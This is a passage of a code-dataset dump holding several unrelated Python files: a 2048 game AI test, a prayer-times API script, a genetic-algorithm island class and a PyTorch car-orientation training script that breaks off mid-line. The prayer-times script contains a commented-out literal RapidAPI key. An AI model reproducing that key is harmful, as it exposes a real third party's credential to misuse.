unittest\nfrom cp2048 import *\nfrom Ai import *\nclass AITest(unittest.TestCase):\n\n\n\n def test_play_random_moveinfini(self):\n jeu = Game2048()\n print(type(jeu))\n playRandomModed(jeu,-1)\n self.assertTrue(jeu.gameover())\n \n def test_play_random_move(self):\n jeu=Game2048()\n li=[]\n for j in range(4):\n g= jeu.copy()\n g.play(j)\n li.append(g.game)\n playRandomModed(jeu.game,1)\n self.assertIn(jeu.game,li)\n #On teste si im ne varie pas entre 2 essais pour être sur de faire le bon choixaa\n def test_strat_2048(self):\n averages = [0,0,0,0]\n jeu = Game2048(numpy.array([[0,0,2,8],[0,0,2,4],[0,0,0,0],[0,0,0,0]]))\n for firstMove in range(4):\n for i in range(250):\n test = jeu.copy()\n if not(test.gameover()):\n test.play(firstMove)\n averages[firstMove] += playRandomModed(test,-1)/250\n \n im = 0\n for i in range(4):\n if averages[i] > averages[im]:\n im = i\n i2= strategy_2048(jeu.game,jeu.state,jeu.moves)\n self.assertEqual(i2,im)\n\n def test_compute_score():\n jeu= Game2048()\n jeu.game(numpy.array([[0,0,2,8],[0,0,0,0],[0,0,0,0],[0,0,0,0]]))\n test= 0#valeuràtrouver\n i=compute_score(jeu)\n self.assertEqual(i,test)\n\n \n\nif __name__== '__main__':\n unittest.main()\n","repo_name":"Axaxa1/2048","sub_path":"module2048/module2048/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22020916936","text":"import requests\n\n# url = \"https://aladhan.p.rapidapi.com/timingsByCity\"\n#\n# querystring = {\"country\":\"Uzbekistan\",\"city\":\"Fergana\",\"school\":\"1\"}\n#\n# headers = {\n# \t\"X-RapidAPI-Key\": \"c04aa4972bmsh1e00bfe24d579e0p1e9e3ejsn9fe4308f1431\",\n# \t\"X-RapidAPI-Host\": \"aladhan.p.rapidapi.com\"\n# }\n#\n# response = requests.request(\"GET\", url, headers=headers, params=querystring)\n#\n# print(response.text)\n\ncity = \"Toshkent\"\nurl = f\"https://islomapi.uz/api/present/day?region={city}\"\n\nr = requests.get(url).json()\nprint(r)\n","repo_name":"shamshod8052/namoz-vaqti-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1757701182","text":"# Island.py\r\n# Brandon Jones, Jonathan Roberts, Josiah Wong\r\n# Homework 4\r\n\r\nimport time\r\nimport math\r\nimport random\r\nimport pickle\r\n\r\n\r\nfrom ga.parameters import Parameters\r\nfrom ga.fitness_function import FitnessFunction\r\nfrom ga.tldr import TLDR\r\nfrom ga.onemax import OneMax\r\nfrom ga.number_match import NumberMatch\r\nfrom ga.chromo import SummaryChromo, SummaryTools\r\nimport ga.hwrite as hwrite\r\nfrom tools.file_tools import fopen\r\n\r\nclass Island(object):\r\n\r\n def __init__(self, parms, file_name, tldr, r_seed, island_id=0):\r\n \"\"\" Constructor \"\"\"\r\n\r\n # Start timing the GA\r\n self.start_time = time.clock()\r\n\r\n # Get params file name\r\n self.parm_values = self.set_parameters(parms, file_name)\r\n self.run_seed = r_seed\r\n\r\n # Set up recording structures\r\n self.gen_best = []\r\n self.gen_avg = []\r\n self.run_best = []\r\n for i in range(self.parm_values.num_runs):\r\n self.gen_best.append([])\r\n self.gen_avg.append([])\r\n self.run_best.append([])\r\n\r\n # Write parameters to summary output file\r\n id_str = self.get_id_str()\r\n summary_file_name = \"../Output/\" + self.parm_values.exp_id + id_str + \"_summary.txt\"\r\n self.summary_output = open(summary_file_name, \"w\")\r\n self.parm_values.output_parameters(self.summary_output)\r\n\r\n # Set up Fitness Statistics matrix\r\n self.fitness_stats = []\r\n for i in range(2):\r\n temp = []\r\n for j in range(self.parm_values.generations):\r\n temp.append(0)\r\n \r\n self.fitness_stats.append(temp)\r\n\r\n # Set up arrays to record every generation's best/avg\r\n for i in range(self.parm_values.num_runs):\r\n for j in range(self.parm_values.generations):\r\n self.gen_best[i].append(-1)\r\n self.gen_avg[i].append(-1)\r\n \r\n # Calculate number of elites\r\n self.num_elites = int(self.parm_values.pop_size * self.parm_values.elitism_rate)\r\n if self.num_elites == 0 and self.parm_values.elitism_rate > 0:\r\n self.num_elites = 1\r\n self.elites = []\r\n for i in range(self.num_elites):\r\n self.elites.append(SummaryChromo())\r\n\r\n # Problem specific setup\r\n self.problem = tldr\r\n print(self.problem.name)\r\n \r\n # Initialize stuff\r\n self.best_of_gen_chromo = SummaryChromo()\r\n self.best_of_run_chromo = SummaryChromo()\r\n self.best_over_all_chromo = SummaryChromo()\r\n self.best_of_run_r = -1\r\n self.best_of_run_g = -1\r\n \r\n if self.parm_values.min_or_max == \"max\":\r\n self.default_best = 0.0\r\n self.default_worst = 999999999999999999999.0\r\n else:\r\n self.default_best = 999999999999999999999.0\r\n self.default_worst = 0.0\r\n \r\n self.best_over_all_chromo.raw_fitness = self.default_best\r\n \r\n self.r = 0\r\n \r\n \r\n #Key for codes:\r\n #0 represents uniform distribution\r\n #1 represents logarithmic uniform distribution\r\n #2 represents normal distribution \r\n def set_parameters(self, parms, file_name):\r\n \"\"\" Sets the parameters that this local GA will use \"\"\"\r\n\r\n # JR should change this method\r\n #mut_rate = Island.generate_mut_rate(1)\r\n #xover_rate = Island.generate_xover_rate(0)\r\n #pop_size = Island.generate_pop_size()\r\n \r\n # Default - just takes parms from file\r\n #return Parameters(file_name)\r\n \r\n return parms\r\n \r\n \r\n def get_id_str(self):\r\n \"\"\" Returns a string that uniquely identifies this island \"\"\"\r\n ret_str = \"\"\r\n ret_str += \"_r\" + str(self.run_seed) + \"_\"\r\n ret_str += \"m0.\" + str(int(100*self.parm_values.mutation_rate)) + \"_\"\r\n ret_str += \"x0.\" + str(int(100*self.parm_values.xover_rate)) + \"_\"\r\n ret_str += \"p\" + str(int(self.parm_values.pop_size)) + \"_\"\r\n ret_str += \"s0.\" + str(int(100*self.parm_values.sparsity)) + \"_\"\r\n return ret_str\r\n \r\n def start_run(self):\r\n \"\"\" Initializes stuff to begin a run \"\"\"\r\n \r\n self.r += 1 \r\n \r\n self.best_of_run_chromo.raw_fitness = self.default_best\r\n \r\n # Initialize first generation\r\n self.member = []\r\n self.child = []\r\n for i in range(self.parm_values.pop_size):\r\n self.member.append(SummaryChromo())\r\n self.child.append(SummaryChromo())\r\n \r\n self.g = -1\r\n \r\n \r\n def get_best_of_gen(self):\r\n \"\"\" Returns best elite to migrate to other islands \"\"\" \r\n return self.best_of_gen_chromo \r\n \r\n \r\n def run_next_generation(self, migrants=[]):\r\n \"\"\" Executes one generation of local GA \"\"\"\r\n \r\n self.g += 1\r\n \r\n self.sum_pro_fitness = 0\r\n self.sum_scl_fitness = 0\r\n self.sum_raw_fitness = 0\r\n self.sum_raw_fitness2 = 0\r\n self.best_of_gen_chromo.raw_fitness = self.default_best\r\n\r\n for m in range(len(migrants)):\r\n worst_of_gen_chromo = self.member[0] \r\n for i in range(self.parm_values.pop_size):\r\n if i > 0:\r\n if self.parm_values.min_or_max == \"max\":\r\n if self.member[i].raw_fitness < worst_of_gen_chromo.raw_fitness:\r\n worst_of_gen_chromo = self.member[i]\r\n elif self.parm_values.min_or_max == \"min\":\r\n if self.member[i].raw_fitness > worst_of_gen_chromo.raw_fitness:\r\n worst_of_gen_chromo = self.member[i]\r\n\r\n self.member.remove(worst_of_gen_chromo)\r\n self.member.append(migrants[m])\r\n\r\n # Test fitness of each member\r\n for i in range(self.parm_values.pop_size):\r\n\r\n # BJ: If a member changed, it's fitness would be set to -1;\r\n # don't re-evaluate members that haven't changed.\r\n# self.member[i]._reset_fitness()\r\n\r\n if (self.member[i].raw_fitness == -1):\r\n # BJ: Test time...\r\n t0 = time.time()\r\n self.problem.do_raw_fitness(self.member[i])\r\n t1 = time.time()\r\n# print(t1-t0) # Print time fitness evaluation took\r\n\r\n self.sum_raw_fitness += self.member[i].raw_fitness\r\n self.sum_raw_fitness2 += self.member[i].raw_fitness * self.member[i].raw_fitness\r\n\r\n # Update best chromosomes\r\n if self.parm_values.min_or_max == \"max\":\r\n if self.member[i].raw_fitness > self.best_of_gen_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_gen_chromo, self.member[i])\r\n self.best_of_gen_r = self.r\r\n self.best_of_gen_g = self.g\r\n if self.member[i].raw_fitness > self.best_of_run_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_run_chromo, self.member[i])\r\n self.best_of_run_r = self.r\r\n self.best_of_run_g = self.g\r\n if self.member[i].raw_fitness > self.best_over_all_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_over_all_chromo, self.member[i])\r\n self.best_over_all_r = self.r\r\n self.best_over_all_g = self.g \r\n else:\r\n if self.member[i].raw_fitness < self.best_of_gen_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_gen_chromo, self.member[i])\r\n self.best_of_gen_r = self.r\r\n self.best_of_gen_g = self.g\r\n if self.member[i].raw_fitness < self.best_of_run_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_run_chromo, self.member[i])\r\n self.best_of_run_r = self.r\r\n self.best_of_run_g = self.g\r\n if self.member[i].raw_fitness < self.best_over_all_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_over_all_chromo, self.member[i])\r\n self.best_over_all_r = self.r\r\n self.best_over_all_g = self.g\r\n \r\n # Accumulate fitness statistics\r\n self.fitness_stats[0][self.g] += self.sum_raw_fitness / self.parm_values.pop_size\r\n self.fitness_stats[1][self.g] += self.best_of_gen_chromo.raw_fitness\r\n \r\n self.average_raw_fitness = self.sum_raw_fitness / self.parm_values.pop_size\r\n self.stddev_raw_fitness = math.sqrt(math.fabs(self.sum_raw_fitness2 - self.sum_raw_fitness*self.sum_raw_fitness/self.parm_values.pop_size)/(self.parm_values.pop_size-1))\r\n \r\n print(str(self.r) + \"\\t\" + str(self.g) + \"\\t\" + str(self.best_of_gen_chromo.raw_fitness) + \"\\t\" + str(self.average_raw_fitness) + \"\\t\" + str(self.stddev_raw_fitness))\r\n \r\n # Output generation statistics to summary file\r\n self.summary_output.write(\" R \")\r\n hwrite.right(self.r, 3, self.summary_output)\r\n self.summary_output.write(\" G \")\r\n hwrite.right(self.g, 3, self.summary_output)\r\n hwrite.right_places(float(self.best_of_gen_chromo.raw_fitness), 11, 4, self.summary_output)\r\n hwrite.right_places(self.average_raw_fitness, 11, 4, self.summary_output)\r\n hwrite.right_places(self.stddev_raw_fitness, 11, 4, self.summary_output)\r\n self.summary_output.write(\"\\n\")\r\n \r\n \r\n \"\"\" SCALE FITNESS OF EACH MEMBER AND SUM \"\"\"\r\n \r\n if self.parm_values.scale_type == 0: # No change\r\n for i in range(self.parm_values.pop_size):\r\n self.member[i].scl_fitness = self.member[i].raw_fitness + 0.000001\r\n self.sum_scl_fitness += self.member[i].scl_fitness\r\n \r\n elif self.parm_values.scale_type == 1: # Invert fitness\r\n for i in range(self.parm_values.pop_size):\r\n self.member[i].scl_fitness = 1 / (self.member[i].raw_fitness + 0.000001)\r\n self.sum_scl_fitness += self.member[i].scl_fitness\r\n \r\n elif self.parm_values.scale_type == 2: # Scale by rank (max fitness)\r\n \r\n # Copy genetic data to temp array\r\n for i in range(self.parm_values.pop_size):\r\n self.member_index[i] = i\r\n self.member_fitness[i] = self.member[i].raw_fitness\r\n \r\n # Bubble sort the array by floating point number\r\n for i in range(self.parm_values.pop_size-1, 0, -1):\r\n for j in range(0, i):\r\n if self.member_fitness[j] > self.member_fitness[j+1]:\r\n self.t_member_index = self.member_index[j]\r\n self.t_member_fitness = self.member_fitness[j]\r\n self.member_index[j] = self.member_index[j+1]\r\n self.member_fitness[j] = self.member_fitness[j+1]\r\n self.member_index[j+1] = self.t_member_index\r\n self.member_fitness[j+1] = self.t_member_fitness\r\n \r\n # Copy ordered array to scale fitness fields\r\n for i in range(self.parm_values.pop_size):\r\n self.member[self.member_index[i]].scl_fitness = i\r\n self.sum_scl_fitness += self.member[self.member[i]].scl_fitness\r\n \r\n elif self.parm_values.scale_type == 3: # Scale by rank (min fitness)\r\n \r\n # Copy genetic data to temp array\r\n for i in range(self.parm_values.pop_size):\r\n self.member_index[i] = i\r\n self.member_fitness[i] = self.member[i].raw_fitness\r\n \r\n # Bubble sort the array by floating point number\r\n for i in range(1, self.parm_values.pop_size):\r\n for j in range(self.parm_values.pop_size-1, i-1, -1):\r\n if self.member_fitness[j-1] < self.member_fitness[j]:\r\n self.t_member_index = self.member_index[j-1]\r\n self.t_member_fitness = self.member_fitness[j-1]\r\n self.member_index[j-1] = self.member_index[j]\r\n self.member_fitness[j-1] = self.member_fitness[j]\r\n self.member_index[j] = self.t_member_index\r\n self.member_fitness[j] = self.t_member_fitness\r\n \r\n # Copy ordered array to scale fitness fields\r\n for i in range(self.parm_values.pop_size):\r\n self.member[self.member_index[i]].scl_fitness = i\r\n self.sum_scl_fitness += self.member[self.member[i]].scl_fitness\r\n \r\n else:\r\n print(\"ERROR - No scaling method selected\")\r\n \r\n \r\n \"\"\" PROPORTIONALIZE SCALED FITNESS FOR EACH MEMBER AND SUM \"\"\"\r\n \r\n for i in range(self.parm_values.pop_size):\r\n self.member[i].pro_fitness = self.member[i].scl_fitness / self.sum_scl_fitness\r\n self.sum_pro_fitness += self.member[i].pro_fitness\r\n\r\n\r\n \"\"\" CROSSOVER AND CREATE NEXT GENERATION \"\"\"\r\n\r\n parent1 = -1\r\n parent2 = -1\r\n\r\n # Save the elites\r\n self.member.sort(key=lambda M: M.raw_fitness)\r\n# self.sort_members()\r\n self.get_elites()\r\n \r\n # Assume always two offspring per mating\r\n for i in range(0, self.parm_values.pop_size, 2):\r\n \r\n # Leave room for the elites\r\n if (i + self.num_elites) >= self.parm_values.pop_size:\r\n break\r\n \r\n # Select two parents\r\n parent1 = SummaryChromo.select_parent(self.member, self.parm_values)\r\n parent2 = SummaryChromo.select_parent(self.member, self.parm_values)\r\n while parent2 == parent1:\r\n parent2 = SummaryChromo.select_parent(self.member, self.parm_values)\r\n\r\n # Crossover two parents to creat two children\r\n randnum = random.random()\r\n if randnum < self.parm_values.xover_rate:\r\n SummaryChromo.mate_parents(self.member[parent1], self.member[parent2], self.child[i], self.child[i+1])\r\n else:\r\n SummaryChromo.clone(parent1, self.member[parent1], self.child[i])\r\n SummaryChromo.clone(parent2, self.member[parent2], self.child[i+1])\r\n\r\n # Mutate children\r\n randnum = random.random()\r\n for i in range(self.parm_values.pop_size):\r\n if randnum < self.parm_values.mutation_rate:\r\n self.child[i].do_mutation()\r\n \r\n # Swap children with last generation\r\n for i in range(self.parm_values.pop_size):\r\n SummaryChromo.copy_b2a(self.member[i], self.child[i])\r\n\r\n # Add the elites back in\r\n if self.g == self.parm_values.generations-1:\r\n self.insert_elites(True)\r\n else:\r\n self.insert_elites(False)\r\n \r\n \r\n def finish_run(self):\r\n \"\"\" Wraps up stuff to finish a run \"\"\"\r\n \r\n hwrite.left(self.best_of_run_r, 4, self.summary_output)\r\n hwrite.right(self.best_of_run_g, 4, self.summary_output)\r\n self.problem.do_print_genes(self.best_of_run_chromo, self.summary_output)\r\n print(str(self.r) + \"\\t\" + \"B\" + \"\\t\" + str(float(self.best_of_run_chromo.raw_fitness)))\r\n print() \r\n \r\n # Pickle best Chromo\r\n f_name = (\"../Output/Best Chromos/chromo\" +\r\n \"-f\" + str(self.best_of_gen_chromo.raw_fitness) +\r\n \"-p\" + str(self.parm_values.pop_size) +\r\n \"-m\" + str(self.parm_values.mutation_rate) +\r\n \"-x\" + str(self.parm_values.xover_rate) +\r\n \".p\")\r\n with fopen(f_name, \"wb\") as fp:\r\n pickle.dump(self.best_of_gen_chromo, fp, protocol=2)\r\n \r\n def shut_down(self):\r\n \"\"\" Code for when this local GA is done with all runs \"\"\"\r\n\r\n # Output fitness statistics matrix\r\n self.summary_output.write(\"Gen | AvgFit | StdDev-Avg | BestFit | StdDev-Best\\n\")\r\n\r\n for i in range(self.parm_values.generations):\r\n hwrite.left(i, 15, self.summary_output)\r\n\r\n # Print avg of avg\r\n hwrite.left_places(self.fitness_stats[0][i]/self.parm_values.num_runs, 20, 4, self.summary_output)\r\n\r\n # Print std dev of avg of avg\r\n stddev_avg = 0\r\n avg_avg = self.fitness_stats[0][i]/self.parm_values.num_runs\r\n for r in range(self.parm_values.num_runs):\r\n stddev_avg += (self.gen_avg[r][i] - avg_avg) * (self.gen_avg[r][i] - avg_avg)\r\n stddev_avg = math.sqrt(stddev_avg / (self.parm_values.num_runs-1))\r\n hwrite.left_places(stddev_avg, 20, 4, self.summary_output)\r\n\r\n # Print avg of best\r\n hwrite.left_places(self.fitness_stats[1][i] / self.parm_values.num_runs, 20, 4, self.summary_output)\r\n\r\n # Print std dev of avg of best\r\n stddev_best = 0\r\n avg_best = self.fitness_stats[1][i] / self.parm_values.num_runs\r\n for r in range(self.parm_values.num_runs):\r\n stddev_best += (self.gen_best[r][i] - avg_best) * (self.gen_best[r][i] - avg_best)\r\n stddev_best = math.sqrt(stddev_best / self.parm_values.num_runs)\r\n hwrite.left_places(stddev_best, 20, 4, self.summary_output)\r\n \r\n self.summary_output.write(\"\\n\")\r\n \r\n self.summary_output.write(\"\\n\")\r\n self.summary_output.close()\r\n \r\n print()\r\n print(\"Start: \" + str(self.start_time))\r\n end_time = time.clock()\r\n print(\"End: \" + str(end_time))\r\n \r\n \"\"\" ELITISM CODE \"\"\"\r\n \r\n \r\n def swap(self, i, j):\r\n \"\"\" Swaps contents of two SummaryChromo instances \"\"\" \r\n\r\n temp = SummaryChromo()\r\n SummaryChromo.copy_b2a(temp, self.member[i])\r\n SummaryChromo.copy_b2a(self.member[i], self.member[j])\r\n SummaryChromo.copy_b2a(self.member[j], temp)\r\n\r\n def get_elites(self):\r\n \"\"\" Copies best individuals to elites list \"\"\"\r\n\r\n if self.parm_values.min_or_max == \"min\":\r\n for i in range(self.num_elites):\r\n SummaryChromo.copy_b2a(self.elites[i], self.member[i])\r\n\r\n elif self.parm_values.min_or_max == \"max\":\r\n for i in range(self.num_elites):\r\n SummaryChromo.copy_b2a(self.elites[i], self.member[self.parm_values.pop_size-i-1])\r\n\r\n def insert_elites(self, do_print):\r\n \"\"\" Adds unaltered elites back into the population \"\"\"\r\n\r\n if do_print:\r\n print(\"Elites:\")\r\n for i in range(self.num_elites):\r\n print(str(self.elites[i].raw_fitness) + \" \" + str(self.elites[i].fit_dict))\r\n \r\n for i in range(self.num_elites):\r\n SummaryChromo.copy_b2a(self.member[self.parm_values.pop_size-i-1], self.elites[i])\r\n","repo_name":"bwj-GitHub/CAP-5512-Summarization-GA","sub_path":"ga/island.py","file_name":"island.py","file_ext":"py","file_size_in_byte":19347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16282584835","text":"# -*- coding: utf-8 -*-\nimport os\nimport io\nimport struct\nimport random\nimport glob\nimport csv\nimport time\n\nimport numpy as np\nimport cv2\n\t\nimport sys\n\nimport torch\nfrom torch import nn\nfrom torchvision import transforms\nfrom torch import optim\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport matplotlib.ticker as ticker\nfrom PIL import Image\n\n#変数定義\n#5\n#TESTDATASET_DIR_IMG = '../datasets/CompCars-origin/data/image/**/**/**/'\n#TESTDATASET_DIR_LBL = '../datasets/CompCars-origin/data/label/**/**/**/'\n#8\nTESTDATASET_DIR_IMG = '../datasets/CompCars/data/image/**/**/**/'\nTESTDATASET_DIR_LBL = '../datasets/CompCars/data/label/**/**/**/'\nIMG_TESTDATASET_PATH_IMG = sorted(glob.glob('{}*.jpg'.format(TESTDATASET_DIR_IMG)))\nIMG_TESTDATASET_PATH_LBL = sorted(glob.glob('{}*.txt'.format(TESTDATASET_DIR_LBL)))\n\nnumber_of_label = 8\nnumber_of_img = 10000\n#MODEL_PATH = '../voe/model/model-{}label.pt'.format(number_of_label)\nMODEL_PATH = '../voe/model/model-test-8-1206.pt'\n#MODEL_PATH = '../voe/model/model-3ch.pt'\n\n\nimg_width = 113\nimg_height = 113\nINPUT_FEATURES = number_of_label+1\nMIDDLE_LAYER = 6\nMIDDLE_LAYER2 = 3\nOUTPUT_FEATURES = 1\n\ndef available_cuda():\n return 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\ndevice = torch.device(available_cuda())\n\nclass I_module(nn.Module):\n def __init__(self, in_dim: int, h_dim: int, out_dim: int):\n super(I_module, self).__init__()\n self.branch1 = nn.Sequential(\n nn.Conv2d(in_dim, h_dim, kernel_size=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, out_dim, kernel_size=3, padding=1),\n nn.ReLU(inplace=True)\n )\n self.branch2 = nn.Sequential(\n nn.MaxPool2d(kernel_size=1),\n nn.Conv2d(in_dim, out_dim, kernel_size=1),\n nn.ReLU(inplace=True)\n )\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n return torch.cat([branch1, branch2], 1)\n\nclass F_module(nn.Module):\n def __init__(self, in_dim: int, out_dim: int):\n super(F_module, self).__init__()\n self.linear1 = nn.Sequential(\n nn.Conv2d(in_dim, out_dim, kernel_size=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_dim, out_dim, kernel_size=3),\n nn.ReLU(inplace=True)\n )\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.linear1(x)\n return x\n\nclass VoNet(nn.Module):\n def __init__(self):\n super(VoNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n I_module(in_dim=64, h_dim=96, out_dim=128),\n nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n F_module(256, 256),\n F_module(256, 384),\n nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n F_module(384, 384),\n F_module(384, 512),\n )\n self.classifier = nn.Sequential(\n nn.Dropout2d(p=0.25),\n nn.Conv2d(512, 1000, kernel_size=1),\n nn.ReLU(inplace=True),\n nn.AdaptiveAvgPool2d((1,1))\n )\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.features(x)\n x = self.classifier(x)\n return torch.flatten(x, 1)\n\n#-------------------------------------------------------------------------#\n\ndef plot(losses):\n # ここからグラフ描画-------------------------------------------------\n # フォントの種類とサイズを設定する。\n \"\"\" グラフを描画してpng, svgに書き出す \"\"\"\n it = range(1, len(losses)+1)\n plt.plot(it, losses, label='Training loss')\n plt.xlabel('iter')\n plt.ylabel('Losses')\n plt.ylim(17.0, 50.0)\n plt.gca().xaxis.set_major_locator(ticker.MultipleLocator(100000)) # iter軸を5刻みに\n # plt.legend()\n plt.savefig('loss(8lbl).svg')\n plt.savefig('loss(8lbl).png')\n plt.show()\n\n# 3層の全結合ニューラルネットワーク\nclass NeuralNet(nn.Module):\n def __init__(self, in_features, hidden_size1, hidden_size2, out_features):\n super(NeuralNet, self).__init__()\n self.fc1 = nn.Linear(in_features, hidden_size1) \n self.relu = nn.ReLU()\n self.fc2 = nn.Linear(hidden_size1, hidden_size2) \n self.relu = nn.ReLU()\n self.fc3 = nn.Linear(hidden_size2, out_features) \n\n \n def forward(self, x):\n out = self.fc1(x)\n out = self.relu(out)\n out = self.fc2(out)\n out = self.relu(out)\n out = self.fc3(out)\n return out\n\n\ndef sort_node(input):\n if number_of_label == int(8):\n tmp1 = input[0][4]\n input[0][4] = input[0][3]\n input[0][3] = input[0][1]\n input[0][1] = tmp1\n tmp2 = input[0][5]\n input[0][5] = input[0][6]\n input[0][6] = input[0][7]\n input[0][7] = tmp2\n #print(\"sorted_node[8label]\")\n else:\n tmp = input[0][3]\n input[0][3] = input[0][1]\n input[0][1] = input[0][4]\n input[0][4] = tmp\n #print(\"sorted_node[5label]\")\n return input\n\nif __name__ == \"__main__\":\n model = VoNet()\n model.to(device)\n \n # 学習済みモデルを読み込む\n model.load_state_dict(torch.load(MODEL_PATH))\n #transformの定義(画層のリサイズとテンソル型への変換)\n transform = transforms.Compose([\n transforms.Resize((img_width, img_height)),\n transforms.ToTensor()\n ])\n #transformの定義(テンソル型への変換)\n transform_array = transforms.Compose([\n transforms.ToTensor()\n ])\n \n #print(len(IMG_TESTDATASET_PATH_IMG))\n #test_array = []\n second_input = []\n label_val = []\n\n #linear_regression用のデータセット作成\n #for n in range(len(IMG_TESTDATASET_PATH_IMG)):\n for n in range(number_of_img):\n IMG_PATH = IMG_TESTDATASET_PATH_IMG[n]\n img = mpimg.imread(IMG_PATH)\n #imgplot = plt.imshow(img)\n #plt.show()\n image = Image.fromarray(img)\n image = transform(image).unsqueeze(0).to(device)\n ##線形回帰の入力値であるvonetの出力値をoutputに得る\n output = model(image)\n _, pred = torch.max(output, 1)\n z = np.int64(pred[0].item())\n #print('[%4d]枚目の予測ラベル(最大値) %1d.' % (n, z))\n #print('[%4d]枚目の正解ラベル(最大値) %1d.' % (n, ))\n #numpy ndarrayに変換して不要な要素を削除\n d = output.device\n output_numpy = output.to('cpu').detach().numpy().copy()\n #output_numpy = np.delete(output_numpy,np.s_[number_of_label::],1)\n output_numpy = np.delete(output_numpy,np.s_[number_of_label+1::],1)\n output_numpy = np.delete(output_numpy,0,1)\n #要素の順番を入れ替える(意味があるか不明)\n output_numpy = sort_node(output_numpy)\n second_input.append(sort_node(output_numpy.tolist()))\n # 実角度データ(label)の読み込み\n with open(IMG_TESTDATASET_PATH_LBL[n]) as f:\n data = f.readlines()[1]\n label_val.append(data)\n #print(\"読み込んだ実角度:\",label_val[n])\n #データの確認\n #conf = 6\n #print(\"{}枚目の画像のパス:{}\".format(conf,IMG_TESTDATASET_PATH_IMG[conf]))\n #print(\"{}枚目のlabelのパス:{}\".format(conf,IMG_TESTDATASET_PATH_LBL[conf]))\n #print(\"{}枚目のlabelの実角度:{}\".format(conf,label_val[conf]))\n\n #sys.exit()\n #listをndarrayに変換\n second_input = np.array(second_input)\n label_val = np.array(label_val)\n #tensor型に変換\n second_input = torch.tensor(second_input.astype(np.float32)).clone()\n second_input = second_input.to(device)\n second_input1 = torch.reshape(second_input, (-1, number_of_label))\n\n label_val = torch.tensor(label_val.astype(np.float32)).clone()\n label_val = label_val.to(device)\n label_val = torch.reshape(label_val,(-1, 1))\n\n x = torch.reshape(torch.ones(number_of_img),(-1,1))\n x = x.to(device)\n \n #8labelのとき\n if(number_of_label == 8):\n second_input = torch.cat((x, second_input1), 1) \n else:\n #5labelのとき\n #print(\"xsize:\",x)\n #print(\"second:\",second_input)\n second_input = torch.cat((x, second_input1), 1) \n \n #全結合層に入力(学習を行う)\n #linear_regression_train(second_input,label_val)\n y = label_val\n\n model = NeuralNet(INPUT_FEATURES, MIDDLE_LAYER, MIDDLE_LAYER2, OUTPUT_FEATURES)\n model.to(device)\n model.train()\n criterion = nn.L1Loss() \n opt = optim.SGD(model.parameters(), lr=0.005) \n niter = 150000 * 2 # number of iteration\n losses = []\n for i in range(niter):\n # batch dataの取得 \n opt.zero_grad() \n outputs = model(second_input)\n loss = criterion(outputs.reshape(y.shape), y)\n print(\"loss:\",loss.item())\n # 誤差逆伝播で勾配を更新\n loss.backward()\n opt.step()\n losses.append(loss.item()) #損失値の蓄積\n print(\"重み:\", list(model.parameters()))\n plot(losses)\n \n\n\n#--------------------------------------------------\n\"\"\"\ndef linear_regression_train(x, y):\n model_linear_detection = nn.Linear(INPUT_FEATURES, MIDDLE_LAYER, bias = True)\n model_linear_detection1 = nn.Linear(MIDDLE_LAYER, OUTPUT_FEATURES, bias = True)\n\n model_linear_detection.to(device)\n model_linear_detection1.to(device)\n opt = optim.SGD(model_linear_detection.parameters(), lr=0.03) \n opt1 = optim.SGD(model_linear_detection1.parameters(), lr=0.03) \n criterion = nn.L1Loss() \n #criterion = nn.MSELoss() \n\n niter = 150000 # number of iteration\n losses = []\n for i in range(niter):\n # batch dataの取得 \n opt.zero_grad() \n opt1.zero_grad() \n outputs = model_linear_detection(x)\n outputs = nn.functional.relu(outputs)\n outputs = model_linear_detection1(outputs)\n #print(\"out:\",outputs.data[0])\n #print(\"label:\",y.data[0])\n #print(\"reshapedout:\",outputs.reshape(y.shape))\n loss = criterion(outputs.reshape(y.shape), y)\n print(\"loss:\",loss.item())\n # 誤差逆伝播で勾配を更新\n loss.backward()\n opt.step()\n opt1.step()\n losses.append(loss.item()) #損失値の蓄積\n #print(\"1層\",list(model_linear_detection1.parameters()))\n #print(\"2層\",list(model_linear_detection2.parameters()))\n print(\"1層\",list(model_linear_detection.parameters()))\n print(\"2層\",list(model_linear_detection1.parameters()))\n print(\"loss:\",loss.item())\n #print(\"重み1:\",model_linear_detection1.bias.to('cpu').detach().data.numpy().copy()[0])\n #print(\"重み2:\",model_linear_detection2.bias.to('cpu').detach().data.numpy().copy()[0])\n #b = model_linear_detection.bias.to('cpu').detach().data.numpy().copy()[0]\n #b = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 0].copy()\n #w1 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 1].copy()\n #w2 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 2].copy()\n #w3 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 3].copy()\n #w4 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 4].copy()\n #w5 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 5].copy()\n #w6 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 6].copy()\n #w7 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 7].copy()\n #w8 = 